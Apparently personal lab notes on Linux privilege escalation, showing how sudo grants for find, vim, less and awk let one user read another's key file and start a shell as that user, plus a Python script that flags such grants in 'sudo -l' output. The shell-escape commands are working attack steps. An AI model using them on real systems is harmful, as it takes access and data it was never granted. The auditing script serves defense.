Linux Privilege Escalation

  1. Privilege escalation with "sudo -l" and "sudo -u"
    1. With Find command
      1. I am logged in as the user varun;
      2. but there is another user, neptune, who holds some sensitive files;
      3. when I checked 'sudo -l', it showed I can use the find command on behalf of the neptune user;
      4. sudo -u neptune find /home/neptune; (it gave me the neptune folder);
      5. sudo -u neptune find /home/neptune -name 'key.txt'; (it gave me the key; now I need to read the key.txt file);
      6. sudo -u neptune find /home/neptune -name key.txt -exec cat {} \;
        1. I can also use bash, and then sh, in place of cat
    2. With vim command
      1. Vim commands:
        1. i = insert,
        2. esc = leave insert mode,
        3. :q! = quit without saving,
        4. :wq = save and quit,
        5. :r /path (e.g. :r /home/user/key.txt) = read a file into the buffer
      2. I am logged in as the user varun;
      3. but there is another user, neptune, with other sensitive files;
      4. when I checked 'sudo -l', it showed the vim command can be used on neptune's behalf;
      5. sudo -u neptune vim /home/neptune/key.txt; (gave me the key, with vim open)
      6. Now I can run commands like:
        1. sudo -u neptune vim; (it will open vim for me);
        2. :r /home/neptune/key.txt; this will also output the key.txt file;
      7. I can run a shell from vim too:
        1. sudo -u neptune vim;
        2. :!/bin/bash (press enter); (a shell will be started, and now I can go inside the victim's folder, as I am the victim now)
    3. With less command
      1. I am logged in as the user varun;
      2. but there is another user, neptune, with other sensitive files;
      3. when I checked 'sudo -l', it showed the less command can be used on neptune's behalf;
      4. sudo -u neptune less /home/neptune/key.txt; (gave me the key)
      5. sudo -u neptune less /etc/passwd (to get a shell; it will open the password file);
      6. press e; (it will give you examine mode);
      7. Examine: /home/neptune/key.txt (the sensitive directory and file); it will open vim again.
        1. /bin/bash enter. (find the sensitive file, as you are neptune now.)
    4. With the awk programming language: it was allowed
      1. I am logged in as the user varun;
      2. but there is another user, neptune, with other sensitive files;
      3. when I checked 'sudo -l', it showed the awk command can be used on neptune's behalf;
      4. sudo -u victim awk '{print $1}' /home/victim/key.txt (gave me the key);
      5. sudo -u victim awk 'BEGIN {system("/bin/bash")}'   (for the shell)
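
The audit side of the notes above, as an added example (not part of the original notes): a small Python check that reads `sudo -l` output and flags grants for the four programs covered here (find, vim, less, awk). The sample listing and the host name "lab" are constructed, and argument restrictions on a grant are not evaluated, so each finding still needs a manual look.

```python
import os
import re

# Binaries these notes show reading files or starting a shell as another user.
ESCAPABLE = {"find", "vim", "less", "awk"}

ENTRY = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<cmds>.+)$")
TAG = re.compile(r"^([A-Z_]+):\s*")


def audit_sudo_listing(listing):
    """Return (runas, command, risks) for each risky entry in `sudo -l` output."""
    findings = []
    for line in listing.splitlines():
        entry = ENTRY.match(line)
        if not entry:
            continue  # header, Defaults and blank lines
        runas = entry.group("runas").split(":")[0].strip()
        noexec = False
        # Commands are comma-separated; "\," is an escaped comma inside arguments.
        for cmd in re.split(r"(?<!\\),\s*", entry.group("cmds").strip()):
            # Tags such as NOPASSWD: or NOEXEC: apply to the commands after them.
            while (tag := TAG.match(cmd)):
                if tag.group(1) in ("NOEXEC", "EXEC"):
                    noexec = tag.group(1) == "NOEXEC"
                cmd = cmd[tag.end():]
            if not cmd:
                continue
            name = os.path.basename(cmd.split()[0])
            if name != "ALL" and name not in ESCAPABLE:
                continue
            # NOEXEC stops the program spawning a shell, not reading files.
            risks = ["file-read"] if noexec else ["file-read", "shell"]
            findings.append((runas, cmd, risks))
    return findings


# Constructed sample of `sudo -l` output (not taken from a real host).
SAMPLE = """\
User varun may run the following commands on lab:
    (neptune) NOPASSWD: /usr/bin/find, /usr/bin/vim
    (neptune) /usr/bin/less
    (neptune) NOEXEC: /usr/bin/awk, /usr/bin/id
"""

if __name__ == "__main__":
    for runas, cmd, risks in audit_sudo_listing(SAMPLE):
        print(f"run as {runas}: {cmd} -> {', '.join(risks)}")
```

On a real host, pass the text of `sudo -l -U <user>` (run by an administrator) to `audit_sudo_listing` for each account.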
